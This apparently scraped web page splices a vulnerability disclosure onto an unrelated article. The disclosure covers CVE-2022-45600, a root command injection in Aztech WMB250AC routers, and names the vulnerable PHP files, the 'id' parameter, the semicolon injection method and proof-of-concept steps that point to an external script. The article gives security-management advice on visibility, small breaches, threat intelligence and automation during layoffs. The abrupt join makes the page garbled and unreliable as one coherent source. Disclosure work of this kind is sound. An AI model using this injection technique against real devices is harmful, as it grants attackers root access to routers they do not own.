https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45600

Reported by:

TanYeeTat

Product:

Aztech WMB250AC Wireless Mesh Routers

Affected Firmware:

2020 Release (topaz-linux.lzma.img)

Firmware download:

closed source

> Product Manual: https://kylaconnect.com/download-center/

> Vulnerability was reported to Aztech's security team via security@aztech.com on **7th June 2022**, with no response as of 21st February 2023
> 
> *   Kylaconnect Vulnerability Disclosure

**Vulnerability Details**

A Command Injection vulnerability (that leads to Privilege Escalation) exists in multiple webpages (list below), that allows a web-authenticated user to execute arbitrary shell commands on the device as the root user. The root user account could not be accessed in any other conventional methods (e.g., Telnet), and has been locked down by the firmware's configuration. This vulnerability bypasses that configuration and escalates an attacker's privileges to root.

List of affected webpages

*   Line 283 in status_wireless.php
*   Line 54 in config_wps.php
*   Line 81 in assoc_table.php
*   Line 55 in config_macfilter.php
*   Line 54 in config_wps.php

There is a lack of input validation and sanitization in the above list of web pages affecting the processing of a GET parameter,id, which is fed into a shell command that is executed as the root user. Command injection is performed by terminating the preceeding legitimate shell command with a semicolon ;, followed by an arbitrary shell command to inject.

> Snippet of retrieving the GET parameter id
> 
> *   the value of id is stored into interface_id variable

> Further down the PHP codes, the interface_id is fed into multiple exec() calls without validation or sanitization

**Proof of Concept**

The following steps will list how to reproduce this vulnerability

1.  Start the product physically or emulated
2.  Modify the PoC bash script's credentials to authenticate to the web service
3.  Execute the PoC bash script to obtain a root shell on the device

CVE-2022-45600: GitHub - ethancunt/CVE-2022-45600

Despite increased threats, an uncertain economy, and increasing automation, your organization can still thrive.

When the vulnerability in Log4j happened, security teams sought the answer to a seemingly simple question: Am I vulnerable?

Answering that question led to a maelstrom of activity. Security groups requested information from vendors about their level of vulnerability and, in turn, had to respond to their customers about whether they were vulnerable. In many ways, the entire exercise seemed more about legal obligations than making people more secure.

The deluge of information — some of it useful, some of it useless — highlighted the need to rethink how we are doing security in the future.

We're living in a chaotic time. With a possible recession, technology companies trimming their ranks, and businesses pushing further into the cloud and adopting more automation and AI, security teams need to re-evaluate. Do they just follow the traditional playbook without thinking why? Or do they improve what they are doing to make security better?

Here are some focus areas to reduce chaos and increase overall security effectiveness.

**Simplify for Greater Visibility**

Gaining visibility into your applications and infrastructure is essential. Companies expanding their use of the cloud and converting applications to cloud-native infrastructure often see initial growing complexity because of a period of redundancy and hybrid infrastructure.

Pushing beyond that stage provides both cost and security benefits. Limiting the use of third-party tools to capture and analyze data for security teams is important. There's really no reason to, say, pull NetFlow data off the cloud infrastructure, when that same data — and more — is natively available.

Explore your cloud service provider's tools. Major cloud providers will often provide you detailed data, and you can reduce the complexity of the infrastructure needed to analyze that data.

**Pay Attention to Even the "Small" Breaches**

When NASA astronauts start getting emails in French, it's time to investigate.

That's what happened to Gavin early in his security career. Turns out two students in France were using Telnet to get into the NASA server and using it to send email. The incident ended up driving a greater project around making sure NASA had a robust data classification system and better data isolation.

Weird anomalies can be signs of an attack, but they can also drive a security team to better understand their organization's infrastructure. Investigations are time consuming but also often worthwhile, so even the small stuff should be investigated.

**Threat Intelligence Can Help**

Usually, a security team's most precious commodity is time. The old method of analyzing every IT project (even as they are changing) and looking for security issues is untenable.

Threat intelligence can help cut through the noise. By using threat intelligence, your security team can take a priority-based approach to architecture based on real-world attack intelligence. At the same time, they can deprioritize other areas. Threat intelligence can also help refine your playbooks and increase the maturity of your security team.

**Thriving With Automation, Planning for Layoffs**

Security teams are facing other sorts of stress, with most economists expecting a recession. Security teams still need to be able to perform, despite stressors and even in the face of losing some of their headcount.

To focus on the most important aspects of security, even with fewer people, companies need to adopt more automation, machine learning, and artificial intelligence. Every team should be asking how to speed up manual tasks with automation. Automation, correctly applied, can free up staff to be working on the areas.

In the past, security teams have been considered a roadblock — a bump on the way to a company's core business of making money. Most teams have moved past the reflexive need to say no. We're here to make sure that the business is taking educated risks, but at the end of the day, just saying no to everything doesn't help anyone.

As every security manager surveys the horizon, they need to look at how they have traditionally approached problems. And they should consider whether now is time to say yes to something new.

Tag

#telnet